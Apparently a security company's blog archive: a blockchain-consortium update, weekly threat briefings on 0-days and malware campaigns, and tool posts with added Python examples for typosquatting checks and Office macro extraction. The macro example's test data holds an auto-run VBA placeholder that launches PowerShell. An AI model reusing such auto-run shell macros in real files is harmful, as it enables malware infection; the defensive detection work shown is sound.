Alastria 3.0: the Spanish blockchain consortium

José Luis Núñez Díaz    14 June, 2021

On June 1st, the Annual Assembly of Alastria, the Spanish Blockchain consortium, was held. Today we already have more than 500 members: companies of all sizes, profiles and industries, as well as representatives of public administrations and universities. As at every assembly, a new Board of Directors was elected to steer the association over the coming years. Beyond names and positions, the newly elected Board reflects the renewal we want to undertake in order to adapt the association to the new times, times in which the economic situation may not be very favourable. Nevertheless, we firmly believe that Alastria has a role to play.

When we founded the association in 2017, we were crystal clear about its purpose. It was not just about setting up another Blockchain consortium. We all believed in the transformative power of the technology and its ability to have an impact on society. That is why the aim of the partnership has never been solely to carry out projects with distributed and/or decentralised ledger technologies (i.e., Blockchain). For almost four years we have been trying to use Blockchain to promote the digital economy and improve Spain’s competitiveness through technology.

Alastria 2.0

Much has been achieved in recent years. Perhaps the most significant milestone was the publication by UNE of the first global standard on decentralised digital identity. This standard is not only inspired by Alastria’s work; several of our partners took part in its development and approval. There has also been a strong commitment to international initiatives. In Europe, Alastria collaborates in the definition and design of both EBSI (European Blockchain Services Infrastructure) and ESSIF (European Self-Sovereign Identity Framework). We have also been a major contributor to laying the foundations of INATBA and LACChain, the latter of which adopts all of Alastria’s learnings in terms of decentralised governance.

But the usefulness of an association like Alastria is not in the past, but in the future. So, I would like to take this opportunity to share the priorities we are going to work on from now on:

  1. Encourage the adoption of decentralised identity models, placing value on the Alastria ID model.
  2. Make reliable decentralised networks accessible to partners.
  3. Get closer to the public sector.
  4. Reinforce the role of the association as a forum for SMEs and large companies.
  5. Explore alternative financing models that guarantee the sustainability of the association and the collaboration of its members.

Identity

We have already spoken in this blog about Self Sovereign Identity (SSI). As we said, Spain can be proud to be the first country in the world with a standard on this concept. Recently, the European Commission announced the creation of a European digital identity. In short, Digital Identity is in fashion and Alastria is in an unbeatable position to help its partners to benefit from it.

Over the next few years, we will work hard to make it possible for anyone to use their Digital Identity for all kinds of online transactions. We are not just thinking about authenticating you to a third party in a way that is easy, secure and privacy-preserving, with you in control of your data. We want to enable the use of that identity on a massive scale in the economy. It should let you rent a bike, pay taxes or open a bank account.

As a consequence, the identity model itself is not an end but a means, and a very powerful enabler of new use cases. We are going to work on this identity model along three lines of action:

  1. Dissemination and adoption: making the Alastria_ID model known among partners and encouraging them to use it in their services, especially among public administrations, in order to make it the reference model for digital authentication of citizens before the administration.
  2. Technology: Alastria_ID is a work in progress. We will evolve and strengthen it by improving the consumption tools and facilitating its accessibility. We will also work on its interoperability with other solutions such as ESSIF and LACChain.
  3. Ecosystem and partnership: we will promote the internationalisation of the UNE standard based on the Alastria_ID model, proposing its adoption in organisations such as CEN/CENELEC, ETSI, ITU, ISO, etc. We will also promote its inclusion among the Hyperledger projects, the de facto standard for enterprise Blockchain.

Networks and Platforms

We want the founding aspiration of the Association to become a reality. We must build a permissioned public ecosystem with guarantees available to any company that wants to deploy decentralised applications.

Alastria is technology agnostic and guarantees the quality standards and regulatory compliance of the networks promoted by its members. The Association does not operate networks, but it does ensure that partners can choose between different alternatives to deploy their use cases, since each use case has different functional and operational requirements related to its business. This is why we will create the “Alastria Compliant” network decalogue, which will set out basic criteria for operation, onboarding, documentation, evolution, interoperability and services (e.g., Alastria ID).

The last point, interoperability and services, is absolutely crucial. Not only do Alastria’s networks need to connect in a so-called native way with the services of the European infrastructure under development, EBSI, but also with the growing number of Blockchain National Networks (BNNs) that are constantly appearing, promoted by or with the participation of governments.

All networks with this status will comply with the governance, best practice and interoperability policies established by Alastria and its partners through the working groups. The Alastria Compliant status should ensure that, for example, the evidence recorded in that network has full legal validity. It has no influence on the technology implemented, the specific operating model or the number of members.

On the other hand, it will be key for partners to have access at all times to a network with the most relevant technologies in the industry. Consequently, the development of new networks with new technologies will be promoted, including, if possible, a public network in collaboration with public authorities.

Public Sector

More than 50 public administrations (local, regional or state) are represented in Alastria. However, blockchain is still far from being a commonly adopted technology in the public sector. Therefore, it is necessary for the Association to continue to act as an evangelist of blockchain technology among the different administrations.

Alastria must become the meeting point for Public Administrations that need the technology developed in Alastria. To this end, we will put special focus on giving Public Administrations visibility of all the projects that partners carry out and of how those projects can be of interest to them. As a first example and spearhead, we will encourage public-private cooperation in the development of identity projects, helping partners already involved in such projects to bring in the public sector as a stakeholder. As a result, we will ensure that the partners’ technology helps to improve the way citizens and businesses interact with the Administration.

In short, we have a brilliant opportunity to take advantage of the work we have done and strengthen Spain’s position in Blockchain technology.

Ecosystem And Collaboration Between SMEs And Large Companies

There is no particular company profile required to be an Alastria partner. You don’t even have to be a Blockchain company. We encourage any public or private company to join and to collaborate with academic institutions and professional entities, regardless of size, economic sector, technological profile or geographical location. All Alastria members have the same status, the same responsibilities and the same benefits.

But the real value of Alastria’s ecosystem develops when partners collaborate. That is why we will continue to encourage collaboration between companies with different profiles. We will launch a new Open Call with the support of large companies, administrations, incubators/accelerators and investors as the backbone of this objective. This time, the challenges posed will be aligned with the lines defined for Spanish and European funds. We hope that this measure will allow the partners to benefit from new financing channels.

Financing

Alastria is a non-profit association and we commit all our resources to transferring value to our members. With this objective, numerous initiatives have been launched in recent years to connect our members’ value propositions with open innovation ecosystems, accelerators and public institutions, and to make them visible. Many opportunities have been created for Alastria’s SMEs to present their use cases and gain visibility in national and international forums and conferences. But perhaps the most relevant initiative has been the Project Table. Its purpose is to gather, bring together and evaluate partners’ projects with a view to the European Union’s Next Generation funds. In short, the aim is to energise the ecosystem and promote collaborative models that maximise the return for partners while making the best possible use of the association’s resources.

From another perspective, Alastria should encourage the use of the available networks by showcasing use cases to partners. Over the coming months, we will analyse the 47 published use cases deployed on Alastria networks in order to approach them proactively. Additionally, we will study the implementation on Alastria networks of a monetisation/licensing mechanism through which partners can license the use cases they have deployed. This mechanism will enhance the sustainability of the networks and provide an additional incentive for partners to deploy and share their use cases.

Cyber Security Weekly Briefing June 5-11

ElevenPaths    11 June, 2021

Microsoft’s monthly bulletin

Microsoft has released its June security bulletin, which fixes 50 vulnerabilities, including remote code execution (RCE), denial of service, privilege escalation and memory corruption flaws. Five of the fixed vulnerabilities allow remote code execution: CVE-2021-33742 (a 0-day that was under active exploitation), CVE-2021-31963, CVE-2021-31967, CVE-2021-31959 and CVE-2021-31985.

Also noteworthy among the security updates are patches for seven 0-days, six of which were being actively exploited:

  • CVE-2021-33742 (CVSS 7.5): remote code execution vulnerability in the Windows MSHTML platform.
  • CVE-2021-33739  (CVSS 8.4): Microsoft DWM core library privilege escalation vulnerability.
  • CVE-2021-31199 and CVE-2021-31201 (CVSS 5.2): Microsoft enhanced cryptographic provider privilege escalation vulnerabilities.
  • CVE-2021-31955 (CVSS 5.5): Windows kernel information disclosure vulnerability.
  • CVE-2021-31956  (CVSS 7.8): Windows NTFS privilege escalation vulnerability.
  • CVE-2021-31968 (CVSS 7.5): Denial of Service vulnerability in Windows Remote Desktop Services. This is the only fixed 0-day for which there is no evidence of exploitation.

More info: https://msrc.microsoft.com/update-guide/en-us

New PuzzleMaker campaign uses a 0-day chain in Chrome and Windows 10

Researchers have identified a new group, dubbed PuzzleMaker, that has been using a chain of 0-day exploits in Google Chrome and Windows 10 in highly targeted attacks against companies around the world. The campaign has been active since mid-April, when the first victims’ systems were compromised. The exploit chain starts with a remote code execution vulnerability in Chrome’s V8 JavaScript engine to gain a foothold on the system. The attackers then use a privilege escalation exploit against up-to-date Windows 10 builds that chains an information disclosure bug in the Windows kernel (CVE-2021-31955) with a privilege escalation flaw in Windows NTFS (CVE-2021-31956); both have now been patched. Once the Chrome and Windows exploits have given them access to the victim’s system, PuzzleMaker downloads and runs four additional malware modules from a remote server. First, a stager reports that exploitation succeeded and then fetches and executes a more complex dropper, which in turn installs two executables masquerading as legitimate Windows system files; the second of these is a remote shell and can be considered the main payload of the attacks. No overlap has been found between this malware and any known malware family.

Chrome Bulletin – New 0-day actively exploited

Google has published a new stable channel update for Chrome on Windows, Mac and Linux that fixes several security flaws. Among them is a new high-severity 0-day, CVE-2021-30551, which, according to Google, is being actively exploited. Shane Huntley of Google has confirmed in a tweet that this exploit is being used by the same group linked to the exploitation of CVE-2021-33742, the 0-day in the Edge browser fixed by Microsoft this week. The new 0-day is a type-confusion bug in the open-source V8 engine: a remote attacker who lures the user to a specially crafted website can exploit it to execute arbitrary code on the victim’s system. The same update also fixes a critical use-after-free vulnerability in the BFCache optimisation system (CVE-2021-30544).

Learn more: https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html

New groups exploit old SonicWall VPN vulnerabilities

CrowdStrike’s incident response team has found ransomware operators exploiting an old SonicWall VPN vulnerability (CVE-2019-7481, CVSS 7.5) affecting Secure Remote Access SRA 4600 appliances in several incidents. Exploitation against SRA devices had not previously been reported. According to CrowdStrike, the flaw affects firmware versions prior to 10.x, even though SonicWall’s advisory only listed versions prior to 9.0.0.3 as affected, because the fix shipped in the latest Secure Mobile Access (SMA) firmware does not reach SRA devices. In February 2021, SonicWall’s PSIRT also disclosed a 0-day (CVE-2021-20016, CVSS 9.8) affecting its SMA 100 appliances that required updating to versions later than 10.x; SonicWall did not state whether it affected the older SRA VPN appliances still in production, as those are considered end of life. CrowdStrike’s analysis focused on the 2019 vulnerability because public proofs of concept already exist for it; the firm states that it does not want to provide information attackers could use, as there is no public PoC for the 2021 vulnerability at this time.

Full info: https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/

Siloscape: the first malware targeting Windows containers

Palo Alto Networks researcher Daniel Prizmant has detailed the first malware campaign targeting Windows containers. In July 2020 a technique for escaping a Windows container in Kubernetes and reaching the container cluster was made public. Microsoft initially did not treat it as a vulnerability, arguing that Windows containers should not be relied on as a security boundary, but later acknowledged it as CVE-2021-24096 once it was shown that the escape from container to host works without administrator privileges. The new malware, named “Siloscape”, targets Kubernetes through Windows containers, planting a backdoor in misconfigured Kubernetes clusters that is then used to run malicious containers for cryptocurrency mining or to exfiltrate data from the applications running in the cluster. The initial attack vector into the containers has mainly been web vulnerabilities such as CVE-2020-14882, vulnerable PHP applications, SQL injection or exposed Redis services.

More details: https://unit42.paloaltonetworks.com/siloscape/

When I grow up I want to be… Engineer

ElevenPaths    10 June, 2021

“What do you want to be when you grow up?” A classic. So simple, yet so complex, and curiously so often asked when we are just kids… when perhaps we should ask this question ourselves every day (but we will talk about that another day). In my case, as a kid, I was pretty clear, I wanted to be a “painter, like Picasso”. Although it is true that, in general, I was always curious about any subject and I enjoyed telling my parents and my brother what I had learnt. I even played at being a teacher and made up exercises, I would say it was one of my favourite games. I never gave it much more thought and I didn’t do wrong, after all I was a kid, the important thing was to play.

Then one day, my parents bought a computer. I was fascinated. I was especially captivated by a certain application that allowed you to make infinite drawings, colouring with a simple “click” and making shapes, and of course typing and writing infinite letters on a screen. And of course, video games (and playing them).

I didn’t think much more about it, until it was time to decide what to study: would I then fulfil my childhood idea of being a painter or a teacher? Although I wasn’t totally sure, I thought that studying engineering might be fun, especially if it was related to computers. Actually, I didn’t know what kind of job I would have afterwards (hands up if you knew), but I made my bet (Telecommunications Engineering) and I think I was right. I enjoyed doing the degree, but at the end I wondered if I could go further, it was hard to think that the road had ended up there. I went through several jobs… and that’s when I started to fit the pieces together and decided that what I would really enjoy was being an engineering teacher (2 in 1). Although the road towards this was particularly tough, I decided to go back to university again, this time to do my PhD. And I finished it, but not before travelling to many countries for conferences and research stays, meeting a lot of people, and continuing to learn (and play). I made it! I am now a professor of engineering at the University of Alcalá. But no, this is not yet the end, it is just another stage in my journey. And for now, in engineering I have found a motivating landscape, full of logic games and challenges, full of tears some days, but big smiles on others. But above all I have discovered that engineering is not only computers, chips and cables… it is also creativity and imagination, it is to be able to solve problems of any kind: technological, economic, social… it is still playing! I am lucky enough to feel like a “painter” even though my tools are not brushes, and I am excited to help, to the best of my ability, to solve the problems and great challenges of the future of society. The only problem is that I will need some help, are you up for it?

We Are Taking Part in The Arsenal Black Hat USA 2021: Hybrid Pandemic Mode On

Innovation and Laboratory Area in ElevenPaths    8 June, 2021

Once again, the ElevenPaths Innovation and Lab team is taking part in the Black Hat USA 2021 Arsenal in Las Vegas to share a new open-source tool with the community. Given this year’s pandemic, Black Hat is organising a hybrid event, with the option of attending on site and online or in a fully online mode. It will take place on 4 or 5 August, when part of our team, represented by Carlos Ávila, Diego Espitia, Claudio Caracciolo and Franco Piergallini Guida, will present an internal development that will be released publicly during those days: an open-source tool we have called PackageDNA.

PackageDNA

As malware campaigns embedded in software development packages are steadily increasing, we identified the need to automate the analysis of the third-party packages (PyPI, npm, gem, godev, etc.) that we pull into our developments every day without questioning how they work or what they do internally.

PackageDNA was born to fill this need, giving developers and researchers the ability to analyse the packages they use in depth, automatically and at scale. Among its functions, it enumerates the internal features and metadata of a package and runs a series of automated analyses: searching for known CVEs affecting the package, scanning its files for malware, checking for typosquatting of the package name and reviewing the history of the package’s developer across the analysed repositories, among other features.
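To make the typosquatting check concrete, the following is an added Python example and not PackageDNA’s own code: it screens a candidate package name against a list of popular PyPI names using PEP 503 name normalisation, a Damerau-Levenshtein (optimal string alignment) edit distance and a few prefix/suffix patterns. The POPULAR list, the affix regexes and the distance thresholds are assumptions constructed for the demo; a real screen would load the most-downloaded names from the registry being analysed.

```python
"""Screen a package name for typosquatting against a list of popular packages.

Added example, not code from PackageDNA. The POPULAR list, the affix
patterns and the distance thresholds are constructed assumptions for the
demo; a real screen would load the top-N most-downloaded names from the
registry being analysed (PyPI, npm, ...).
"""
import re

# Constructed sample of well-known PyPI names; not a live download list.
POPULAR = ["requests", "urllib3", "numpy", "python-dateutil", "setuptools",
           "cryptography", "pyyaml", "django", "flask", "boto3"]


def normalize(name: str) -> str:
    """PEP 503 name normalisation: lowercase, runs of '-', '_' and '.' -> '-'.
    PyPI treats 'Python_DateUtil' and 'python-dateutil' as the same project."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment (restricted Damerau-Levenshtein) distance.
    Insertion, deletion, substitution and adjacent transposition cost 1 each,
    so 'reqeusts' is one edit from 'requests' (a typical typosquat)."""
    n, m = len(a), len(b)
    d = [[0] * (m + 1) for _ in range(n + 1)]
    for i in range(n + 1):
        d[i][0] = i
    for j in range(m + 1):
        d[0][j] = j
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[n][m]


def strip_affixes(name: str) -> str:
    """Drop decorations attackers bolt onto a real name ('python-requests',
    'requests3', 'numpy-dev'). The affix lists are illustrative assumptions."""
    core = re.sub(r"^(python|py|node|npm)-", "", name)
    core = re.sub(r"-?(python|py|js|dev|lib)$", "", core)
    return re.sub(r"\d+$", "", core)


def typosquat_candidates(name: str, popular=POPULAR):
    """Return (popular_package, reason) pairs that `name` may be impersonating.

    An exact (normalised) match returns [] because that *is* the genuine
    package. Short names get a tighter threshold: one edit away from a
    five-letter name is far more likely to be an unrelated real project."""
    cand = normalize(name)
    hits = []
    for pkg in popular:
        target = normalize(pkg)
        if cand == target:
            return []
        allowed = 1 if len(target) <= 5 else 2
        dist = osa_distance(cand, target)
        if dist <= allowed:
            hits.append((pkg, f"edit distance {dist}"))
        else:
            core = strip_affixes(cand)
            if core and core == strip_affixes(target):
                hits.append((pkg, "prefix/suffix variation"))
    return hits


if __name__ == "__main__":
    for suspect in ["reqeusts", "python-requests", "setup_tools", "NumPy"]:
        print(f"{suspect:16} -> {typosquat_candidates(suspect)}")
```

Hits are leads for a human or for a further automated check (download counts, publication date, maintainer history), not verdicts: “dask” is one edit from “flask” and both are genuine projects, which is exactly why short names get the tighter threshold.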

The tool is open-source, free and modular, and has the ability to present the results in different formats, in a visually friendly and centralised way.

As mentioned above, the tool is currently in use by our internal team and will be made available for public download after the Arsenal presentation, so that everyone can use it and contribute to the project openly.

Cyber Security Weekly Briefing May 29- June 4

ElevenPaths    4 June, 2021

Vulnerability in SonicWall Network Security Manager

SonicWall has released security patches for a vulnerability affecting on-premises versions of its Network Security Manager (NSM) firewall management solution. Tracked as CVE-2021-20026 with a CVSS score of 8.8, this command injection flaw can be exploited without user interaction, although, as a mitigating factor, the attacker must be authenticated to the system. It affects NSM 2.2.0-R10-H1 and earlier, but not the already fixed versions 2.2.1-R6 and 2.2.1-R6 (Enhanced). The vulnerability only affects on-premises NSM deployments; SaaS versions are unaffected. Although the company has not indicated that there is any immediate danger of exploitation, SonicWall urges customers to remediate this flaw immediately.

More details: https://www.sonicwall.com/support/product-notification/security-advisory-on-prem-sonicwall-network-security-manager-nsm-command-injection-vulnerability/210525121534120/

Analysis of the malware used by threat actor Nobelium

Microsoft has published an analysis of the artefacts used in the initial stage of the USAID impersonation campaign by threat actor Nobelium, also known as APT29, which was behind the SolarWinds supply chain attack. There are four new malware families that have been identified:

  • EnvyScout: allows the theft of NTLM credentials from Windows accounts and places a malicious ISO image on the compromised device. This malware has also been identified in a phishing campaign against the Belgian Embassy.
  • Boombox: .exe file included in the ISO that acts as a downloader by downloading the encrypted malicious artefacts from Dropbox. It is also capable of collecting information about the Windows domain to forward it to a remote server in an encrypted form.
  • NativeZone: DLL that acts as a loader and starts automatically when a user logs on to Windows in order to launch CertPKIProvider.dll (VaporRage).
  • VaporRage: DLL that has shellcode download and execution capabilities from C2 servers and with which attackers perform various malicious activities, including the installation of Cobalt Strike beacons.

Learn more: https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

Active exploitation of a 0-day vulnerability in the Fancy Product Designer plugin

An active exploitation campaign against a 0-day vulnerability in the Fancy Product Designer WordPress plugin has been detected. The plugin is installed on more than 17,000 websites and allows customising how products are displayed on WordPress, WooCommerce and Shopify. The flaw is an unauthenticated arbitrary file upload leading to remote code execution, tracked as CVE-2021-24370 (CVSSv3 9.8), and affects version 4.6.8 and earlier of the plugin on the WordPress, WooCommerce and Shopify platforms. The researchers note, however, that attacks are likely to be blocked on Shopify, which enforces stricter access controls. Complete removal of the plugin is recommended until a patch is available, since the vulnerability can sometimes be exploited even when the plugin is deactivated.

All the details: https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/

Distribution of Teabot and Flubot via malicious apps and websites

Since December 2020, several attacks against Android devices with the Teabot and Flubot malware families have been reported. Bitdefender researchers have recently identified a new wave of apps that distribute these banking trojans by impersonating top-rated legitimate apps from the Android store. Teabot can carry out overlay attacks through Android’s accessibility services, intercept messages, perform keylogging, steal Google authentication codes and even take full remote control of infected devices. So far it targets well-known banks such as Bankia, BBVA, Banco Santander and ING Spain, among others. Flubot, for its part, has had a significant impact in Germany, Spain, Italy and the United Kingdom. Its entry vector continues to be SMS messages impersonating parcel delivery companies such as DHL, FedEx or Correos. Flubot can steal banking details, contacts, SMS and other private data, and can execute further commands received from the C2 server, including sending SMS with attacker-supplied content.

Learn more: https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/

Epsilon Red: new ransomware exploiting Microsoft Exchange Proxylogon vulnerabilities

Sophos researchers have discovered a new ransomware, named Epsilon Red, while investigating an attack on an unnamed major US hospitality company. According to the researchers, the threat actors gained entry by exploiting the ProxyLogon vulnerabilities, as the company had not applied the security patches for its Microsoft Exchange servers. Once inside the network, the attackers gained access via RDP and used Windows Management Instrumentation (WMI) to run software and PowerShell scripts, ultimately deploying the Epsilon Red ransomware. The malware itself is written in Go and is accompanied by several PowerShell scripts with functions such as killing processes on the victim’s devices or disabling security solutions, among others. Although the origin of the threat is unknown and both the name and the tooling are unique to this attacker, the ransom note closely resembles that of the REvil ransomware.

More info: https://news.sophos.com/en-us/2021/05/28/epsilonred/

And the President Said, “Enough Is Enough”. The New Cyber Security Proposals from The White House

Sergio de los Santos    4 June, 2021

Joe Biden has signed an Executive Order to improve national cyber security and protect federal government networks more effectively. The attack on oil pipeline operator Colonial Pipeline, a story that reached the mainstream media, was the last straw. Although the cyber security industry could sense that ransomware would end up hitting critical infrastructure and causing chaos, it took the threat materialising for a reaction to occur. Hopefully it will have beneficial consequences. Cyber security now has another game-changing attack to remember in its history.

Negative events capable of changing the laws, the paradigm or the collective awareness of an industry can be counted on one hand. In cyber security, perhaps (without trying to be exhaustive) we can point to Blaster in 2003 and Sasser in 2004, which completely changed the perception of security at Microsoft, already quite damaged at the time. Stuxnet in 2010 warned us about cyberweapons and made the world aware of a new cyber and geopolitical strategy. And of course WannaCry in 2017, a blow to the industry’s pride, attacked at that stage by a worm exploiting an already patched vulnerability. And despite years of dealing with ransomware, it has taken an impact with serious consequences for the United States to tighten the rules. Because, if we think about it, this was the next logical step in the escalation: from attacking users to hijacking SMEs, from SMEs to large companies, from those to organisations and from there, it was assumed, to critical infrastructure. But the incident (along with many others that have followed) has finally prompted the president to react.

This executive order aims to modernise defences but above all to focus on a problem that can still, despite the seriousness of the situation, be mitigated. Fundamentally, the order aims to increase information sharing between the government and the private sector and to improve the ability to respond. The basic action points are:

  • It allows private companies (especially the service providers hosting government systems) to share information with the government, which will speed up investigations when incidents involving access to a server occur. They will also have a maximum time limit for reporting such incidents.
  • Improve and adopt cyber security standards in the federal government. This is a commitment (at a high level, although specific technologies are mentioned) to adopt the best standards (2FA, cryptography, SDLC…) from within the government’s own infrastructure.
  • Improve supply chains, as the SolarWinds attack has taught us. Software sold to the government will have to meet minimum security requirements. There will be a kind of certificate of accreditation, similar to that for energy or emissions.
  • A private and public cyber security review board or commission. When an accident occurs, it will be managed and conclusions will be drawn in a coordinated manner. This commission is inspired by the one already in place in aeronautics, where the private and public sector meet after major air incidents.
  • A standard incident response system will be created both internally and externally. Companies will no longer have to wait for something to happen before they know what needs to be done.
  • Improve the defence capability of the federal network. Perhaps the most generic measure, which aims to reinforce with appropriate cyber security tools the entire government infrastructure.
  • Improving remediation and investigation capacity. Perhaps this comes down basically to improving logging systems.

And now, what?

This executive order will mean that companies have to comply with minimum standards, procedures, audits… In short, it will create a healthier industry, one that polices itself more closely. More robust and united, we hope. Something similar to what the debit and credit card companies did when they created PCI DSS, which obliged everyone handling card data to pass a minimum audit. While it will not solve the problem entirely, it will significantly improve it. It puts the focus on cyber security at the highest level, joins forces and, as mentioned, attacks the problem from a political and legal perspective that complements the technical approach, which is insufficient on its own.

However, there is still a lack of clearer laws against attackers which would make it easier to prosecute them, identify them and impose sanctions at a global level. There is now political and legal support to promote security from a technical point of view, but cyber is also legal, social, political… and the activity of attackers must be tackled from all these angles. Such a serious problem, although technical in nature, cannot be solved from only that angle. If we merely concentrate on patching and responding, auditing and certifying, we will not make enough progress. In any case, this order is great news and a first step in that direction.

#LadyHacker: for yourself and for them

ElevenPaths    2 June, 2021

The end of the academic year has arrived and with it the university admission exams. Young women and men pursuing a goal after so many years of effort, an opportunity that was far from equally available not so long ago.

How many of our grandmothers were unable to opt for higher education? Smart, strong and courageous women who put aside their dreams and university aspirations to look after and educate new generations.

To honour them, our role models for life and achievement, #LadyHacker, Telefónica’s global initiative that aims to make the role of women in the technology sector more visible and raise awareness among girls of their potential to study STEM careers, is releasing the third video of its 2021 campaign.

Will you join the #LadyHacker initiative? WE ARE WAITING FOR YOU!

DIARIO: One More Weapon in Thehive’s Arsenal

Andrés Naranjo    1 June, 2021

We already know that the weakest link in the cyber security chain is the user. Studies show that the main reason a cyber-attack on a company succeeds is the email entry vector: the whole disaster often starts with an email carrying an attached file.

Therefore, Telefónica Tech has developed a technology that tackles the problem of analysing Office documents in a novel way: DIARIO. Now the well-known security incident response platform (SIRP) TheHive supports integrating DIARIO into its workflows.

DIARIO is a technology developed entirely by the ElevenPaths Innovation and Laboratory Area, now part of the new Telefónica Tech. Its artificial intelligence engine scans documents for signs of the malicious code used by cybercriminals, giving the user a quick and convenient verdict on how dangerous the file is.

DIARIO: Not Another Antivirus

DIARIO’s ability to detect, using artificial intelligence, the elements commonly used to introduce malicious code into Office documents is most useful precisely where antivirus cannot help. DIARIO does not try to replace traditional antivirus; it complements it by performing a completely different kind of analysis on everything that traditional antivirus methods, usually signature-based, have not been able to detect. DIARIO is very effective on what “escapes” antivirus detection.

Privacy as The Core of DIARIO’s Design

DIARIO is focused on business use and, since the documents involved may be confidential, it has been designed for confidentiality. When faced with a suspicious file, employees often turn to online file-scanning platforms for a second opinion, and those platforms record and store both the content and the metadata of the documents they receive. This can be a serious privacy problem given the sensitive or confidential content of such documents. DIARIO, in contrast, extracts only the parts of the document that could be suspicious and sends those for analysis, never the content of the document itself. The sensitive or confidential information in the document therefore neither circulates nor is stored in any way outside the corporate environment.
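The design principle just described, in the form of an added example. This is not DIARIO’s code and does not use its API: it simply shows what “extract only the suspicious parts” means for an OOXML file. The only part that can carry executable content is the VBA project (vbaProject.bin), so that is the only part read, hashed and handed over; the document body is listed by name but never opened. The sample .docm is constructed in memory, and the VBA blob is a placeholder with a valid OLE header rather than a real macro.

```python
"""Privacy-preserving macro triage for OOXML documents (added example)."""
import hashlib
import io
import zipfile
from typing import Dict

# OLE compound-file signature; a genuine vbaProject.bin is an OLE container.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# OOXML parts that hold VBA. Everything else (document.xml, media, metadata)
# is treated as confidential and is never read by this code.
MACRO_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")


def build_sample_docm(with_macros: bool) -> bytes:
    """Construct a minimal .docm (or .docx when with_macros is False) in
    memory. Constructed test data: the body text stands in for confidential
    content and the VBA blob is a placeholder behind a valid OLE header."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml",
                   "<w:document><w:t>Q3 salary table - CONFIDENTIAL</w:t></w:document>")
        if with_macros:
            z.writestr("word/vbaProject.bin",
                       OLE_MAGIC + b"Sub AutoOpen()\n  Shell \"powershell\"\nEnd Sub")
    return buf.getvalue()


def extract_macro_container(doc: bytes) -> Dict[str, object]:
    """Return only what a macro analyser needs: the vbaProject.bin bytes,
    their SHA-256 and the list of part names. Other parts are never read."""
    with zipfile.ZipFile(io.BytesIO(doc)) as z:
        names = z.namelist()
        blobs = {n: z.read(n) for n in names if n in MACRO_PARTS}
    for name, blob in blobs.items():
        if not blob.startswith(OLE_MAGIC):
            raise ValueError(f"{name} is not an OLE container")
    return {
        "has_macros": bool(blobs),
        "parts": sorted(names),
        "macro_sha256": {n: hashlib.sha256(b).hexdigest() for n, b in blobs.items()},
        "macro_bytes": blobs,
    }


def leaks_body(extracted: Dict[str, object], body_marker: bytes) -> bool:
    """Check the privacy property: nothing leaving the environment may
    contain the document body."""
    return any(body_marker in b for b in extracted["macro_bytes"].values())


if __name__ == "__main__":
    for flag in (True, False):
        result = extract_macro_container(build_sample_docm(flag))
        print("macros:", result["has_macros"], result["macro_sha256"])
        print("body leaked:", leaks_body(result, b"CONFIDENTIAL"))
```

Decompressing the VBA source inside the OLE container (MS-OVBA compression) is left to the analyser; the point here is the boundary: the body of the file stays put, only the macro container and its hash leave.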

TheHive

DIARIO’s trained artificial intelligence is also available for use or integration through other tools or technologies thanks to its developer interface (API). This is why it is very useful as part of TheHive.

TheHive is a security incident response platform (SIRP) that receives alerts from the rest of our cyber security technologies (SIEM, IDS/IPS, firewalls, etc.). It is highly automated and designed to integrate with other tools to improve its efficiency and functionality. In this way, from TheHive and using DIARIO’s artificial intelligence, we can directly scan suspicious files that arrive attached to an alert, obtaining a quick analysis of the Office files involved and an automatic early warning when a file is malicious.

DIARIO is a cross-platform solution that runs on Windows, Linux and MacOS, and can be run directly in the cloud, from the Office365 webmail client as well as in the Outlook desktop application.

You can test DIARIO’s document analysis capabilities quickly and easily from its website: diario.elevenpaths.com.

If you are interested in enjoying the benefits of DIARIO in any of its forms, you can contact Telefónica Cybersecurity & Cloud Tech by filling in the related form on the DIARIO site: diario.elevenpaths.com or in the following email: [email protected].

Cyber Security Weekly Briefing May 22-28

ElevenPaths    28 May, 2021

Windows HTTP protocol stack vulnerability also affects WinRM

Security researchers have discovered that the vulnerability affecting the Windows IIS web server (CVE-2021-31166, CVSS 9.8), which resides in the HTTP protocol stack – http.sys – responsible for processing requests, can also be exploited to attack systems that expose the WinRM (Windows Remote Management) service, allowing unauthenticated attackers to execute arbitrary code. This vulnerability only affects Windows 10 and Windows Server versions 2004 and 20H2. It is worth noting that while this service is disabled in Windows 10 versions, it is enabled by default in Windows Server versions. Although there is no publicly available proof of concept for executing arbitrary code using this vulnerability, researchers have published a proof of concept for performing denial of service attacks by sending a single packet.

More info: https://www.bleepingcomputer.com/news/security/wormable-windows-http-vulnerability-also-affects-winrm-servers/

​​​0-day vulnerability at Apple

Apple has published a security bulletin fixing several security flaws, including a 0-day vulnerability affecting its macOS desktop operating system. The 0-day, discovered by the security firm Jamf and catalogued as CVE-2021-30713, is a bypass of the macOS TCC (Transparency, Consent, and Control) framework and has been exploited for at least a year by the group operating the XCSSET malware. To distribute the sample, the XCSSET operators hide the malicious code in Xcode projects on GitHub, posing as legitimate Apple scripts in order to circumvent TCC. Another vulnerability, discovered by the ZecOps research team and identified as CVE-2021-30741, has also been fixed; it affects iOS and allows execution of malicious code. Apple recommends updating the affected systems to the latest versions.

All the details: https://support.apple.com/en-us/HT201222

Update: new espionage campaign based on Pulse Secure vulnerabilities exploitation

